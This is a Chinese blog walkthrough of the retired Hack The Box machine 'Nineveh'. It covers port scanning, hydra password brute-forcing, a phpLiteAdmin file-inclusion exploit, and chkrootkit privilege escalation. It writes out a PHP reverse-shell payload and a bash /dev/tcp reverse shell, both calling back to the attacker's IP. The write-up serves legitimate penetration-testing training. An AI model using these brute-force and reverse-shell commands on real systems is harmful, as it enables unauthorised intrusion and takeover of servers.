freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

HTB:Nineveh 渗透测试
HBXQ 2021-03-04 19:17:30 167281

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines/profile/54
描述:
图片.png
注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

前言

本次演练使用kali系统按照渗透测试的过程进行操作,在前期信息收集时需要对80与443端口同时进行收集,通过文件包含漏洞获取shell,最后通过Chkrootkit会隔一段时间运行一次的方式写入自己的命令最终提权

一、信息收集

1、靶机ip

ip地址为:10.129.107.203
图片.png

2、靶机端口与服务
nmap -sV -O -A 10.129.107.246

图片.png

PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
3、网站信息收集

进入80端口查看有没有可利用的信息
图片.png
图片.png
查看目录与前端代码没有可利用的信息
通过目录扫描获取到一下链接

http://10.129.107.246/index.html
http://10.129.107.246/info.php
http://10.129.107.246/department/

二、漏洞探测与利用

1、密码爆破

访问http://10.129.107.246/department/
发现这是一个登录界面
通过查看前端代码得知存在admin用户
图片.png
使用hydra进行爆破得到账号密码

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.129.107.246 -V http-form-post '/department/login.php:username=^USER^&password=^PASS^:Invalid Password!'

图片.png
用户:admin
密码:1q2w3e4r5t
图片.png

2、漏洞探测

点击Notes之后发现可能会存在文件包含漏洞
图片.png
直接进行尝试发现不能运行,最后才知道需要提交关键字才可以利用漏洞
图片.png

3、漏洞利用

之前80端口的信息已经收集的差不多了,接下来查看一下443端口
获取相应的链接

https://10.129.107.246/db/index.php

发现这是一个登录界面
图片.png
发现版本为phpadmin1.9 使用searchsploit查找相应漏洞
图片.png
查看24044文件
图片.png
通过描述发现需要登录进入之后才可以利用
这里我们通过burp爆破获得密码:password123
图片.png
图片.png
之后根据文件中的提示创建新的数据库,数据表
注:数据库的名称只有是ninevehNotes.php时才可以利用文件包含漏洞
图片.png
图片.png
经过验证成功执行
图片.png

三、提权

通过文件包含漏洞反弹shell

http://10.129.107.246/department/manage.php?notes=/var/tmp/ninevehNotes.php&cmd=php%20-r%20%27$sock=fsockopen(%2210.10.14.57%22,4242);$proc=proc_open(%22/bin/sh%20-i%22,%20array(0=%3E$sock,%201=%3E$sock,%202=%3E$sock),$pipes);%27

图片.png

获取交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

通过LinEnum.sh查看可利用信息
也没有什么太大的发现
图片.png
最后通过看其他大佬的文章才知道在“/report”的文件夹存在rootkit检测工具
通过检测发现靶机运行了Chkrootkit
通过发现了存在本地提权漏洞
图片.png
通过查看该文件,可知我们只需要在/tmp目录下写入update文件并让文件执行即可获取root权限
图片.png

echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.57/443 0>&1' > update
 chmod +x update

等待一段一段时间带Chkrootkit再次执行时
获取root权限

OQG1AUTNL[]T)ZC0)]MYZAP.png

# 渗透测试 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 HBXQ 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HBXQ LV.5
搬砖小牛马
  • 43 文章数
  • 48 关注者
安卓基础:安卓安装包APK的组成以及生成步骤
2021-10-18
HTB:Dropzone渗透测试
2021-08-26
HTB:Active渗透测试
2021-08-24